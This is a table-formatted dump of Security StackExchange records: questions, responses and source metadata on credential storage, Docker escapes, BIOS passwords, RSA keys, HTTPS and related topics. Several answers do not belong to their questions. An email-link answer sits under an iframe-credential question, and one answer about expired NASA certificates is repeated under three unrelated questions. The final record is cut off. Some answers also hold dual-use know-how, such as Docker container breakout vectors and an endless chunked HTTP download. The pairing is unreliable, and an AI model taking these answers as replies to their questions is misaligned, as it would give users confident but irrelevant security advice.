source_id
int64 1
4.64M
| question
stringlengths 0
28.4k
| response
stringlengths 0
28.8k
| metadata
dict |
---|---|---|---|
152,906 | I have a web app that includes third party websites in iframes. The 3rd party websites require user to be logged in them. Option A is to require the user to login to each website individually via iframes and rely on cookies to remember the user. That however is quite inconvenient and some users would definitely prefer a one login for all websites so that's my option B: It relies almost entirely on frontend security and encryption. First, storing the password. Every user has a password (main password) to my web app. The password, besides being used for logging in to my website, would also be used to encrypt user credentials from user's websites. So credentials are encrypted using the main password on my server and only the user could decrypt them. This is where I have a question, would I just need to encrypt it using the password alone, or some magic secret keys or some stuff could be used to strengthen encryption? Overall process: User logs in to my web app. Main password is stored in browser memory for further use Pulling encrypted credentials from server and decrypting it on the
frontend, using the main password decrypted credentials are stored in browser memory open login iframe and send credentials using postMessage to the login
iframe (origin validation included) log in automatically (I have integration plugin for the sites, that's
why I would be able to do it). Note that logging in to web app and decrypting credentials are 2 different processes. If the user refreshes website, is still logged in, he cannot access the credentials. He will be asked for the password again. That's not a problem, since the session from third party websites will be remembered by the browser anyway. So the frontend data would be protected from iframes by web security and as long as I make sure there are no XSS sinks on the web app, there's no way these passwords are leaking, am I right? Even if the server was compromised. The only way I see it, if the server was compromised and someone edited the frontend code to be malicious and grab the passwords. But that is something that would always be dangerous, even if I didn't implement autologin at all. I just want your opinion if that's a secure way to store and use passwords and what could potentially go wrong. Especially, is it safe to store passwords in javascript memory and how to encrypt credentials - use just the user password or maybe add some secret token to that password (don't know if that makes sense). Anything that would make it more secure. Any help appreciated. | One of my employers told us that if we receive a suspicious email with links, we have to hover over the link (to check that it is not spoofed) before clicking it. When you mouseover a link, the value of the href attribute is displayed in the status bar. Since this is the link target, it can give you an idea about where the link is going. would someone be able to spoof this action and try to do something funny? Generally, yes. The actual link target can be "spoofed" using Javascript: It is quite common for websites to exchange the href value with another link as soon as the user clicks on it. For example, you can observe this when visiting Google search results. When you mouseover one of the links, it will be displayed as https://security.stackexchange.com/... but as soon as you click it, that event is captured and you visit an intermediate site first ( https://www.google.com/url?... ) which redirects you to the actual target. But any well-designed (web-based) mail client will not execute any JS in HTML e-mails. Active script content in e-mails is dangerous - not only because it potentially results in an XSS flaw in the mail client but because it can also be used to run JS-based exploits against the browser or simply inform the sender that you have opened the mail. So, if your mail client disallows JS in e-mails - which it most likely does - then the link displayed on mouseover is indeed the correct link target. But you should be aware of other attempts to deceive you, such as homograph attacks or an overly long URL that disguises the actual target domain. It's not as easy to analyze an URL in the status bar as it is from looking at it in the address bar. In a more advanced attack, the attacker could also have compromised a legitimate site beforehand (e.g. through a persistend XSS flaw) and you won't be able to tell from the link at all that the site now actually hosts dangerous content. | {
"source": [
"https://security.stackexchange.com/questions/152906",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/112239/"
]
} |
152,978 | I'm learning a lot about docker. I'm practicing creating docker clusters using docker-swarm, registry, shipyard, etc. I saw how easy is to get root in a docker host machine once you entered to the host with a limited user which has docker privileges. I was wondering if could be possible instead of this, "escape" from a docker container service to the docker host machine (doesn't care if as root or not). Can this be done? Any proof of concept? I was googling and I haven't found anything conclusive. | A user on a Docker host who has access to the docker group or privileges to sudo docker commands is effectively root (as you can do things like use docker to run a privilieged container or mount the root filesystem inside a container), which is why it's very important to control that right. Breaking out of a Docker container to the host is a different game and will be more or less difficult depending on a number of factors. Possible vectors include :- Kernel vulnerabilities. Containers running on a host share the same kernel as the host, so if there's an exploitable issue in the kernel that may be used to break out of the container to the host Bad configuration. If a container that you have access to is running with --privileged you're likely to be able to get access to the underlying host. Mounted filesystems. If a container you have mounts a host filesystem, you can likely change items in that filesystem which could allow you to esclate privileges to the host. Mounted Docker socket. A relatively common (and dangerous) practice in Docker containers is to mount the docker socket inside a container, to allow the container to understand the state of the docker daemon. This allows a trivial breakout to the host. More information here If you're looking for more information I'd recommend these whitepapers from NCC. Abusing Privileged and Unprivileged Linux Containers and Understanding and Hardening Linix Containers . There's also a presentation I did which covers some of this stuff here . If you're interested in Docker hardening I'd also recommend having a look at the CIS Security standard . | {
"source": [
"https://security.stackexchange.com/questions/152978",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/133285/"
]
} |
153,027 | I made files with MySQL database login details. Using .htaccess , I redirect every user from /Config/config.php to /index.php . I am wondering whatever this is secure enough - this means whatever is enough to stop users from viewing /Config/config.php ? | This can provide adequate security, if configured correctly. I can think of one common flaw: with Apache and rewrite rules, it is often possible to construct an URL that points to the same file and is not redirected. For example, requesting /Config/config.php redirects, but requesting //Config//config.php does not. This is because the rewrite rule matches an exact URL, not any variation. Another common error when using redirecting for security is sending the header to redirect, but not preventing the page to render. An attacker can then access the pages by removing the Location header. However, this is typically an error in the application and not when using Apache to do the redirection. A better way is to place the config file outside of the web root. So you have index.php in a subdirectory public , and config.php outside of this directory. This reduces the possibility that you expose the configuration. | {
"source": [
"https://security.stackexchange.com/questions/153027",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/102283/"
]
} |
153,042 | I'm looking into ways of hardening a computer's security. One of the things is the BIOS. Does adding a password to the BIOS prevent malware from infecting it? I have seen this article: Protecting the BIOS from malware but it doesn't mention about passwords. Any information on this is greatly appreciated. | Absolutely not. The BIOS password is only an authentication mechanism presented when the system boots or when a manual change to the configuration is made during boot. Malware which overwrites the BIOS typically does so by writing over SPI, the interface which the BIOS resides on. If malware gets enough privileges to write to SPI, and your BIOS does not set the proper lock bits that deny access to this interface at runtime, then it is game over. The contents of your BIOS flash chip can be modified completely, including the contents which execute the password authenticating code. The only two ways to ensure malware cannot overwrite the BIOS is either to: Have a BIOS which properly sets all the lock bits at boot, and the only way to make sure of that is to use the chipsec framework and understand the results it gives Use a system which supports BootGuard , an Intel feature in some newer CPUs which causes the chipset to verify the BIOS itself before loading it, ensuring that it can only boot from a BIOS signed with an OEM signing key. This should prevent malicious BIOSes from running (as well as 3rd-party, open-source BIOSes like Coreboot and Libreboot). | {
"source": [
"https://security.stackexchange.com/questions/153042",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/141152/"
]
} |
153,176 | Is it possible to built a file from scratch that when it gets downloaded via HTTP, the download never actually completes ? I am not talking about ZIP BOMB here. Some download software allows you to download streaming events, thus the final size of the file is not known. Is it possible to craft a file where the download software is not able to "guess" the actual file size and keeps on downloading? | Yes it is possible. You just need to use the chunked transfer encoding. https://en.wikipedia.org/wiki/Chunked_transfer_encoding Depending on your server's configuration, you might be able to simply create a CGI script that writes and flushes stdout in an infinite loop. It does not seem to work on Lighttpd which I believe buffers the entire output from the CGI script before sending it to the client. It might work on other webservers though. Example: HTTP/1.1 200 OK\r\n
Transfer-Encoding: chunked\r\n
Content-Type: text/plain\r\n
\r\n
1e\r\n
Uh-oh, this will never stop.\n
1e\r\n
Uh-oh, this will never stop.\n followed by an infinite repetition of "1e\r\nUh-oh, this will never stop.\n" | {
"source": [
"https://security.stackexchange.com/questions/153176",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/5949/"
]
} |
153,354 | My company's system administrator is asking for our passwords for an ISO audit and my VP IT operations support says it's mandatory for ISMS (ISO27001). Can someone confirm if this is true? | Absolutely not! ISO 27001 requires management of passwords and requires having password policies. Someone in your company is interpreting this as needing to inspect all passwords in the clear to ensure that they meet the password policy. But this is a terrible way of doing this audit. Technology should be in place to force people to comply with password policies when they make passwords, not to inspect them by hand once they are made. There is a wide-ranging series of failures if they want to audit passwords by looking at them ... | {
"source": [
"https://security.stackexchange.com/questions/153354",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/141190/"
]
} |
153,446 | A lot of services, sites, and applications offer the 'login with Facebook' or 'login with Google' option. For many sites, the browser opens a separate window in which you can enter your username and password. This way, you can check the URL and convince yourself that the origin really is Google/Facebook/whatever. Logging in in this window should be safe, and there is no reason to worry (apart from any privacy concerns you might have). However, this is not always the case. Though I can not find them now, I am quite sure that there are some sites which require you to login with your Facebook/Google account on their site (so the URL shown is not Facebook/Google). I am sure there are some desktop application which do this as well. One example I can give is Nvidia's GeForce experience. Apart from the ridiculousness of having to sign in on Google or Facebook to update a driver, this does not seem to be good practice, since I can't check if I actually login on Google or that the login window is spoofed. I have read a couple of times that using other services to login is considered good practice. Is this true? I can see some serious problems with it. | I am quite sure that there are some sites which require you to login with your facebook/google account on their site (so the URL shown is not facebook/google). I am sure there are some desktop application which do this as well. This is very bad practice for websites, because OAuth / OpenID (which are protocols used to delegate authentication) is designed to work around that exact use case. But there is no other way to do it in desktop applications, because desktop applications don't have redirect functionality. A web page can forward you to the google or facebook authentication, where you can enter your credentials, and then when you authenticate successfully, Google / Facebook can redirect you back to where you came from. This is impossible to do in a desktop application. One way around it is for the desktop application to open a web browser where you authenticate with your auth provider (Google / Facebook), and some magic happening behind the scenes can then authenticate you to the desktop application. But by and large this is an unsolved problem - you'll simply have to trust the desktop application to not steal your credentials. In fact opening a web browser doesn't really solve the problem either; now you're just trusting the browser to not steal your credentials (The browser is a desktop application, too!) I have read a couple of times that using other services to login is considered good practice. Is this true? It's considered good practice because It's user friendly - users don't have to remember a hundred different credentials On the whole it offers better security - you don't have to trust a hundred different implementations and hope every site is bug-free and stores your password safely - you only have to trust Google, or Facebook, to take care of security. And they're much more capable to do so than your teen-aged nephew who wrote yet another login system for his new site. Of course, it also means you're now putting all your eggs in one basket. If someone breaches your Google / Facebook account, you're in much bigger trouble if you use that account to authenticate on a hundred other sites. Also, there are privacy issues in letting your auth provider know which sites you visit and with what frequency you sign in. | {
"source": [
"https://security.stackexchange.com/questions/153446",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/141541/"
]
} |
153,593 | This method which I am talking about can improve caching of images, videos, and CSS by the ISP rather than just depending on the browser cache. And it also proves the validity of the sender. Is there any reason why this semi-HTTPs not considered? Cost of assymetric signing is one thing I can think of. But if we group chunks of static content and calculate sha256 checksum in batches, validating the signature in the browser can be a better trade off than the end-to-end network cost for each request not in the browser cache. | Why do we need HTTPS for static content? If we can have a checksum at the end signed by the private key, won't that prove the validity? I think you're setting up a strawman with that question. We don't in fact need HTTPS for static content, and the purpose of HTTPS isn't just to prove the validity of the content. That's just one of several purposes.
The move to switch a huge number of sites to HTTPS (even those serving harmless static content, such as wikipedia) in the last couple of years didn't primarily happen because people were worried about getting the wrong content; it's because people were worried about three-letter-agencies spying on users; e.g. the large-scale move to HTTPS happened primarily for privacy reasons (see for example RFC 7258, Pervasive Monitoring is an Attack .) Your idea of using a signed checksum is already in production all over the internet: Software which you download is often verified like that. Package managers / update systems of most operating systems do this, and individual software projects do it on a smaller scale by publishing pgp / gpg signatures along with their software downloads. This all works irrespective of whether these downloads are delivered via https or not, although https is often used in addition . You're suggesting to add a third protocol besides http and https, maybe one called httpv for "verified", that builds content verification into the protocol but leaves out the rest of ssl. I agree there would be an advantage to serving some static content in the clear so it can be cached. But this is not an option if you're worried about privacy issues in light of the intelligence community's programs to spy on all our communication. Any particular reason why this semi HTTPs not considered? So I'd assume that your third protocol can't gather much steam because there already are solutions which work in place when we really need to verify content, and with so much of the internet now becoming encrypted to guard our privacy, it seems like there wouldn't be much use for another protocol that didn't protect against spying. | {
"source": [
"https://security.stackexchange.com/questions/153593",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/16619/"
]
} |
153,719 | I use a SSL in my main domain, that is the one my clients access. However, I have a second domain with the same content (including login credentials) that I use only for test and development. Should I secure this test domain too? | Yes, you should. You might need to test if e.g. a particular request works over HTTPS, but testing on a production system is a bad idea (the production system should remain stable), and your test system should match the production system as closely as possible. Secondly, if you're sharing the login details between domains, why shouldn't the test domain be secured as well? If the price of the certificate is a problem, what you can do is: Get a free cert from Let's Encrypt . Use a self-signed cert. Set up your own internal certificate authority for the test domain (probably the best option). | {
"source": [
"https://security.stackexchange.com/questions/153719",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/107556/"
]
} |
153,750 | I have used ssh-keygen for creating an RSA 4096-bit SSH private and public key pair. I used a passphrase for the private key. If an attacker, Eve, knows the passphrase in addition to the public key: Can they derive the private key? - I presume yes with enough time. If they can derive the public key, what algorithms can they use to do this? - I don't know. What is the number (or order) of operations needed for each algorithm to derive the private key? Update - it seems that with using "yafu" on one computer ( http://iamnirosh.blogspot.co.uk/2015/02/factoring-rsa-keys.html ) that the brute force cracking process / factoring takes significantly less time. Would be interesting to see how much difference yafu makes on a distributed environment and on supercomputers. | The private key is unrelated to the passphrase. So is the public key. The public key is also generally stored unencrypted, even when the private key is protected by a passphrase. (Exceptions may exist where the public key is stored in an encrypted form, but in the basic case and assuming a sufficiently large key, doing so provides no additional security because the public key is meant to be publicly distributed or at least can be assumed to be available to an adversary.) Now, don't get me wrong. Protecting your private key with a passphrase is a very good idea, and it is best practice to do so. The private key and the public key have a mathematical relationship to each other. But your private key is still just a number. This number is unrelated to the passphrase you use to encrypt the file that holds this number, which is all the passphrase does. If an attacker Eve knows the passphrase in addition to the Public Key; Can they derive the Private key? - I presume yes with enough time. The public key is mathematically related to the private key, and the simple answer is that yes, with sufficient time, in theory, one can be derived from the other. The public key almost by definition needs to be transmitted in the clear in order to establish an identity before the encrypted communications channel is set up, so Eve (by convention Eve is a passive eavesdropper; Mallory is an active man in the middle) can see it. Deriving the public key from the private key in RSA is easy. Deriving the private key from the public key is supposed to be computationally infeasible, and with sufficiently large keys effectively impossible. So far as we know, there is no fast way to derive the private RSA key data from a 4096-bit public RSA modulus on a classical computer (which is what we currently have). Even an efficient attack on a 2048-bit public RSA modulus would be quite a feat, though 1024-bit RSA is within the realm of possible in reasonable amounts of time and a 768-bit RSA private key has been factored in public (it took the equivalent of on the order of 2,000 CPU-years on reasonably modern hardware). So, "with enough time", it is possible. But that is unrelated to the passphrase, or lack of passphrase. To understand the why of the above, I will use textbook RSA for simplicity. (Real-world RSA is similar to, but not exactly the same as, textbook RSA, as there are many real-world attacks that textbook RSA doesn't deal with.) Here, among some other numbers, the private key is the pair of prime numbers commonly referred to as p and q , and the public key is their product, n = pq , where n is referred to as the public modulus . Given p and q , calculating n is borderline trivial (you just need to multiply two -- very large -- numbers together), but given only n , determining the corresponding values for p and q is extremely difficult. We have no proof that this is so, though; only the absence of any publicly known easy way to actually do it, even with lots of very smart people having worked at the problem for a long time. It's like figuring out that 15 = 3 * 5, except that instead of numbers of a few digits, the numbers involved are many hundreds of digits. To a first order approximation, with your 4096-bit RSA key, n is about 1300 decimal digits long, and p and q are a little more than 600 decimal digits long each. We can see this because log 10 (2 4096 ) ≈ 1233, and 10 615 * 10 615 = 10 1230 . If they can derive the public key, what algorithms can they use to do this? - I don't know. Semiprime number factorization algorithms. The current state of the art for numbers larger than 10 100 (100 decimal digits, about 332 bits) is the General Number Field Sieve (GNFS) algorithm. A quantum computer could use Shor's algorithm to efficiently factor a semiprime, but (at least in public) we don't yet know how to build a large enough quantum computer that actually works. That's part of what the push toward so-called post-quantum cryptography is about. Last I heard, state of the art was having factored the number 15, but that was a few years ago; it is possible that publicly known quantum computers are now able to factor numbers larger than 15. What is the number (or order) of operations needed for each algorithm to derive the Private key? The complexity of factoring a number using the GNFS is discussed on its Wikipedia page. It's really difficult to discuss the number of operations directly, but after some discussion on prerequisites, the Wikipedia article summarizes by stating that the running time of the number field sieve is super-polynomial but sub-exponential in the size of the input. You can compare the various factoring times and algorithms used for the various RSA numbers , which were part of a competition started in the early 1990s to expand the knowledge relating to integer factorization, now inactive. Compare also How is it possible that people observing an HTTPS connection being established wouldn't know how to decrypt it? Note that HTTPS works differently from SSH, but the basic operating principle remains similar. | {
"source": [
"https://security.stackexchange.com/questions/153750",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/71751/"
]
} |
153,797 | Many security measures are intended to protect against hostile users who want to abuse the software or get access to content they don't have permission to access. Things like CSRF protection, SQLi protection, TLS and many other security features mainly protect against malicious users. But what if all the users can be trusted? Suppose you have a fully internal web application that will only ever run on the intranet of the company and will never be accessible from the outside. assume that all the internal users can be trusted, there are no outside users and the data inside the application is of not much use to attackers. This means the threat model is very limited and there is not much sensitive data. Considering these details, it seems like some of the measures, like TLS and XSS protection, wouldn't be as important. After all, there is very little risk of attackers intercepting traffic, and the users can be trusted to not enter XSS payloads. In this case, would it still make sense to implement security measures against traffic interception or malicious users? | Yes. Absolutely, yes. Your assumptions about your internal network have issues: you assume no attacker would ever gain control of any device in your network, which is a bad assumption to make (see http://www.verizonenterprise.com/verizon-insights-lab/dbir/ , https://www.fireeye.com/current-threats/annual-threat-report/mtrends.html ). Attackers will go quite some length to gain a foothold in a network, and there is a commercial marketplace for buying compromised hosts within specific companies. you assume only users have access, but what about third parties, such as managed service providers, contractors, temporary employees? Also, what happens if someone breaks into wifi? Or gains access to a wired port (e.g. a pwnplug ) More generally, there is also the matter of why have two sets of practice/standards, when surely it is more efficient to have a single standard that applies everywhere? You might find it useful to read Google's paper on BeyondCorp, https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/44860.pdf . The tl;dr being that in their conception of the network, you make assertions about users and devices, but not about the network - mostly because it is simpler to assume all networks are hostile, than it is to assume some are, and some are not (in part, the cost of misclassifying a network as safe could be very, very high). One possible reason for such an approach is that the Snowden leaks revealed that previous assumptions about the safety of their network were incorrect - the NSA tapped into fiber in order to tap into (at the time unencrypted) inter-DC data flows. I think the basic answer to your question is that the boundary/demarcation point for security is no longer at the edge of your network, it is the devices on your network. And as such, it is both simpler, and more realistic, to focus on preventing categories of attacks/abuse, rather than to consider that one network is 'better' than another. You may not need quite such strong controls on an internal DMZ as you would on an external one, but assuming that your network is secure is a dangerous assumption to make. | {
"source": [
"https://security.stackexchange.com/questions/153797",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/34161/"
]
} |
153,961 | I often go to more obscure pages on NASA websites, and I have gotten used to running into an expired security certificate now and then. Over the last week, it started coming up a lot more, to the point I decided maybe I should tell them (rather than simply feel annoyed). But after a little looking around, I realized I had no idea how to direct that message within that giant organization to someone who could actually do something about it. Is there a way for someone to get that message through to the right people? Three recent examples: https://sservi.nasa.gov/ https://trajbrowser.arc.nasa.gov/ https://settlement.arc.nasa.gov/75SummerStudy/Table_of_Contents1.html (Someone else who checked the 2nd and 3rd address said they no longer get the warning, however I still do. The SSERVI site still shows that way for everyone.) Update: The comment to contact the general address makes a good point in that if you do nothing else, you should do that. However, a lot of time could be saved by directing a message to the right people, and it seemed there could be a way to do that, if one knew a little more. That's why I posted at all, I thought someone might search later, find this, and get these notifications to the right place faster. | In this case, the answer is (sort of) in the certs (which is not that uncommon): openssl s_client -connect sservi.nasa.gov:443 | openssl x509 -text
<...snip...>
Authority Information Access:
CA Issuers - URI:http://pki.treas.gov/noca_ee_aia.p7c
CA Issuers - URI:ldap://lc.nasa.gov/ou=NASA%20Operational%20CA,ou=Certification%20Authorities,ou=NASA,o=U.S.%20Government,c=US?cACertificate;binary
OCSP - URI:http://ocsp.treas.gov The first link (minus the P7C file) provides a landing page, with a 'contact us': http://pki.treas.gov/contact_us.htm Another tool (sometimes) worth checking into is whois - but the x509 authority information seems the more appropriate place to check. | {
"source": [
"https://security.stackexchange.com/questions/153961",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/142021/"
]
} |
153,964 | Prologue. Imagine a website with a login. You have an account, enter your e-mail address and a password. Error. Password incorrect. You try two other passwords. Both incorrect and now your account is locked. Fortunately, it's not a timed lock, but you do have to change your password. I click the link in the "you forgot your password"-e-mail and enter a new password. The website responds with: "please choose a password other than your current password". OK, so here's my question: would there be (other) security risks involved if, instead of forcing me to change my password, the e-mail they send me after n invalid passwords, would contain a link that sends me back to the login page, but with n new login attempts? | In this case, the answer is (sort of) in the certs (which is not that uncommon): openssl s_client -connect sservi.nasa.gov:443 | openssl x509 -text
<...snip...>
Authority Information Access:
CA Issuers - URI:http://pki.treas.gov/noca_ee_aia.p7c
CA Issuers - URI:ldap://lc.nasa.gov/ou=NASA%20Operational%20CA,ou=Certification%20Authorities,ou=NASA,o=U.S.%20Government,c=US?cACertificate;binary
OCSP - URI:http://ocsp.treas.gov The first link (minus the P7C file) provides a landing page, with a 'contact us': http://pki.treas.gov/contact_us.htm Another tool (sometimes) worth checking into is whois - but the x509 authority information seems the more appropriate place to check. | {
"source": [
"https://security.stackexchange.com/questions/153964",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/92821/"
]
} |
153,995 | Scenario:
no router, just a laptop network card turned in monitor mode.
(imagine you are in the bus or train) In this scenario can I see all the data that is going through air around me? Can I capture this data? Can I get some relevant info out of this data? (e.g. source and destination of the packets) EDIT: Can I sniff the traffic of other networks (other routers around me, and smarthphones) and get some relevant info? what can I see? I should at least see the source and destination IP, but can I get some info our of this packets or the packets are totally encrypted? This scenario is monitor mode? promiscuous would be when I am actually connected to the network I am sniffing? or do I miss something? | In this case, the answer is (sort of) in the certs (which is not that uncommon): openssl s_client -connect sservi.nasa.gov:443 | openssl x509 -text
<...snip...>
Authority Information Access:
CA Issuers - URI:http://pki.treas.gov/noca_ee_aia.p7c
CA Issuers - URI:ldap://lc.nasa.gov/ou=NASA%20Operational%20CA,ou=Certification%20Authorities,ou=NASA,o=U.S.%20Government,c=US?cACertificate;binary
OCSP - URI:http://ocsp.treas.gov The first link (minus the P7C file) provides a landing page, with a 'contact us': http://pki.treas.gov/contact_us.htm Another tool (sometimes) worth checking into is whois - but the x509 authority information seems the more appropriate place to check. | {
"source": [
"https://security.stackexchange.com/questions/153995",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/141309/"
]
} |
154,013 | A lot of banks I have dealt with require the customer to enter their customer number, internet banking password (or phone password) and date of birth all via the phone keypad, prior to being connected to a staff member. Each of these individual details are followed by the # symbol. After entering these details, the customer can perform most actions (e.g. transfer money or change personal details) without any further verification procedures. Depending on which phone you use, these numbers remain on the screen for the remainder of the phone call. Additionally, when transferring money via this method, the bank no longer requires 2-step authentication, unlike when transferring money via the banking app or website. This is the same regardless of whether you call from the number linked to the account, or an entirely different number. This seems a lot less secure than using the bank app or website. But how much of a security threat does this present? In the context of a smartphone - How easy would it be for malware/spyware/keyloggers to extract the numbers separated by the #, and therefore gain access to the associated bank account via phone banking? | In this case, the answer is (sort of) in the certs (which is not that uncommon): openssl s_client -connect sservi.nasa.gov:443 | openssl x509 -text
<...snip...>
Authority Information Access:
CA Issuers - URI:http://pki.treas.gov/noca_ee_aia.p7c
CA Issuers - URI:ldap://lc.nasa.gov/ou=NASA%20Operational%20CA,ou=Certification%20Authorities,ou=NASA,o=U.S.%20Government,c=US?cACertificate;binary
OCSP - URI:http://ocsp.treas.gov The first link (minus the P7C file) provides a landing page, with a 'contact us': http://pki.treas.gov/contact_us.htm Another tool (sometimes) worth checking into is whois - but the x509 authority information seems the more appropriate place to check. | {
"source": [
"https://security.stackexchange.com/questions/154013",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/-1/"
]
} |
154,190 | What do you call an entity seeking to be authenticated? Is there a single word or short phrase for it? What would you name a variable that represented the party asking to be authenticated? | In IEEE 802.1X terminology that would be the supplicant : Authenticator An Authenticator is an entity that requires authentication from
the Supplicant. The Authenticator may be connected to the
Supplicant at the other end of a point-to-point LAN segment or
802.11 wireless link.
Supplicant A Supplicant is an entity that is being authenticated by an
Authenticator. The Supplicant may be connected to the
Authenticator at one end of a point-to-point LAN segment or
802.11 wireless link. (Source) In other contexts the entity being authenticated is often simply referred to as a client or user as that's in most cases unambiguous. | {
"source": [
"https://security.stackexchange.com/questions/154190",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/142261/"
]
} |
154,314 | I have here at home a router, like many people out there.
The router is connected with an Ethernet cable that comes from the modem. But, to prevent hackers or anything else to try bothering me, if I'm not using the router, is removing the Ethernet cable a good security measure? Or it doesn't do that much in security, so I should leave it always connected? | If there is not an internet connection to your device then a hacker is not going to be able to communicate with that device. (Edit: As some have pointed out...this is assuming an attacker is attempting over the internet from a remote location) With that said, eventually you will have to connect to the internet again if you want to use the internet and if you were to eventually obtain malware on your computer such as a keylogger. That keylogger is going to rely on the internet to send its data back to the hacker. If the keylogger is written properly, when you disconnect, it will just wait for you to connect to the internet again to send its data back to the attacker. In my opinion, I think disconnecting from your internet will prove to be more of a hassle than a protection. Instead, focus on the security of your device and your actions on the internet. Being a smart internet user can provide a great deal of security to your device. Elaboration (EDIT): I do agree that this method with decrease the time of opportunity for an attacker but the reason I chose to put emphasis on endpoint security and user education is because if you imagine an enterprise environment, they have devices and services that rely on an internet connection 24/7. So an enterprise can't rely on disconnecting from the internet as a viable security measure. Instead they focus on securing the devices on the network and the network itself. So I believe this will achieve 2 things: 1) greater security. 2) better user experience(always have internet access on demand) and I believe you can apply these strategies to your personal network as well. | {
"source": [
"https://security.stackexchange.com/questions/154314",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/79507/"
]
} |
154,335 | If we have a proprietary binary protocol used by some application, can we use SSL/TLS to encrypt the protocol's payload without tunneling it through HTTP? | Can we use SSL/TLS to encrypt the protocol's payload without tunneling it through HTTP? Absolutely.
TLS provides secure communication on top of the transport layer and you can easily employ it as a transparent wrapper around your own custom protocols. One advantage of TLS is that it is application protocol independent.
Higher-level protocols can layer on top of the TLS protocol
transparently. The TLS standard, however, does not specify how
protocols add security with TLS; the decisions on how to initiate TLS
handshaking and how to interpret the authentication certificates
exchanged are left to the judgment of the designers and implementors
of protocols that run on top of TLS. (from RFC 5246 for TLS 1.2) HTTP just happens to be one possible application-layer protocol that is commonly transmitted over TLS. There are many other examples where TLS is added to secure a protocol that has no built-in encryption. E.g., if you use a desktop email client, the communication with the mail server (probably using IMAP/POP3/SMTP) will likely be wrapped in TLS, too. TLS can also be used as an encrypted tunnel for the entire network stack for VPN applications (although OpenVPN only uses TLS for authentication, not for for encrypting the actual data - thanks, @ysdx). | {
"source": [
"https://security.stackexchange.com/questions/154335",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/102334/"
]
} |
154,380 | I'm looking to buy a WiFi router on ebay, but the seller put a picture on the site of the router's backside, exposing information such as Serial number Part number MAC address Default password and PIN I plan to wipe the original firmware and replace it with DD-WRT . Could the above information still be used to compromise my network? | Yes this is safe. Default password and PIN are irrelevant if you change them (or replace the firmware.) Serial number is irrelevant anyway. Part number is irrelevant anyway. Which leaves the MAC address. With some routers this is used to compute a default password, but once you change this I don't believe there is any risk. The biggest risk of any router is the potential presence of backdoors that the manufacturer firmware may contain, but given that you are replacing it with DD-WRT that does not matter. | {
"source": [
"https://security.stackexchange.com/questions/154380",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/88435/"
]
} |
154,556 | As titled, we discovered some unknown IP address is accessing our API Server. We have set up an AWS EC2 instance as an API server. The API server URL is only used in our mobile app.
However, our mobile app has not been released yet and the API server URL is not linked from any public website. We can see the (multiple) attackers are randomly trying the URL path, i.e.
/admin/i18n/readme.txt
/a2billing/admin/Public/index.php
/current_config/passwd
/recordings/
/.git/objects How do they discover our server really? | The short answer is that many people are scanning everything most of the time. Doing so was, some years back, considered impractical, but the combination of better networks, better tools better throughput, and more of the space being in use means that is no longer the case. For example, Zmap claims on its front page: ZMap is capable of performing a complete scan of the IPv4 address space in under 5 minutes, approaching the theoretical limit of ten gigabit Ethernet. Botnets tend to distribute the same sort of scan across significant numbers of nodes, to achieve a similar result: any given machine on the internet is likely to be scanned at least once a day by a determined attacker/scanner. Once a webserver is identified on a given IP, there are all kinds of tools to test well-known paths, and tools that will try and guess at your sitemap. In short, welcome to the internet - where obscurity is not security. Do consider this in the context of setting up your app/services/widget - in all likelihood, things you would probably prefer to be 'secret' will not be, and defending your assets and resources is necessary. | {
"source": [
"https://security.stackexchange.com/questions/154556",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/27044/"
]
} |
154,735 | When co-workers travel internationally for business there seems to be risk of bringing a regular work laptop to some countries: the risk is that the government might try to spy on the dta stored on your device. The one's that immediately come to mind is China / N Korea. Is there a list of countries where this risk is highest? Is there a list of countries where it is recommended to take a 'burner laptop'? I am hoping for a list that is relevant to a US-based business. | Assuming you have a basic level of Cyber Security measures e.g. ecrypted hard drives, decent user name and password rules, encrypted VPN tunnels etc. I would say there are a number of issues to consider. Content on the laptops - is this commercially sensitive,
nationally sensitive, any export controls applicable. Effectively who would be interested in the data and what skills / resources do they have at their disposal? Your business - what it is you do and how that can be seen in
different cultures - are you at risk of industrial, national espionage or from hacktivism. The legality of your "standard" IT Security Solution in the country of destination - I believe some countries (especially middle east) have a big problem with encryption and prohibit any encrypted communications. Your level of risk acceptance based on the country of destination. E.g. do you mind if the US authorities exercise their right of search of your device and would you be happy to provide any decryption codes to the border staff before the laptop is taken away for investigation? A multinational company I work closely with all laptops have HDDs which are high level encrypted and where remote access is authorized it is via VPN but only with RSA tokens has a list of "home" countries where standard laptops can be taken, this is essentially all the countries the company has a major presence (except USA). Outside of that the user "should" contact IT and obtain a loan laptop there are 2 levels "amber" and "red" based on Security advice on the country of destination. "Amber" is for relatively friendly countries where for business purposes a clean laptop is taken (so a fresh internal build) with only files needed for the business trip are taken, these can connect via vpn back home and essentially work similar to the traveler's normal laptop. The issue here is to minimize risks from data loss, export offenses etc, whilst maintaining a good level of access "Red" is for particularly risky countries where data intercept is to be expected these include China, Russia or where encrypted VPNs are banned in law. These laptops are very basic with fresh installs of base windows with basic office software, public email, internet access and only approved files may be loaded on to them (e.g. pre-cleared presentations), these "red" devices have no way of 'phoning home' and will be wiped on return and once being marked as a "red" laptop they will remain "red" until they are finally shredded (literally). I have heard some organizations which have a process in place to counter the risk of border security searches e.g. in the US by having a process where the device is encrypted before travel and critically the user does not know the decryption code so is unable to login. That is only disclosed once the traveler gets through immigration the process is printed and the traveler can show that to immigration staff and apparently that gets round the right to search non US citizens, but not being a lawyer I'm not sure how true this is. | {
"source": [
"https://security.stackexchange.com/questions/154735",
